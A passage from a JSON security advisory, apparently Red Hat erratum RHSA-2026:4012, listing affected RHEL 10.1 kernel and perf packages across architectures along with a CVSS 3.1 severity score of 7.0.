"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
